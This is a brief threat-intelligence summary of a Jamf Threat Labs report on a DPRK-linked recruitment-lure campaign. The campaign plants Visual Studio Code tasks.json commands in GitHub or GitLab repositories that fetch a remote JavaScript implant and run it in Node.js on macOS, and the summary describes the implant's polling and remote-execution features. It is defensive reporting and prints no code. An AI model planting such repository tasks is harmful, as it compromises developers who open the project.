Jamf Threat Labs describes an evolution of the DPRK-linked Contagious Interview campaign that abuses Microsoft Visual Studio Code task configuration files in malicious GitHub or GitLab repositories. Under recruitment or technical-assignment lures, a victim who opens and trusts the repository in Visual Studio Code can trigger tasks.json commands that run shell, curl a remote JavaScript payload, and pipe it into Node.js on macOS. The JavaScript implant provides host fingerprinting, public IP discovery through ipify.org, five-second command-and-control polling, and remote code execution through server-supplied JavaScript. Jamf also observed follow-on JavaScript tasking roughly eight minutes after infection, underscoring how the campaign adapts delivery and execution to normal developer workflows.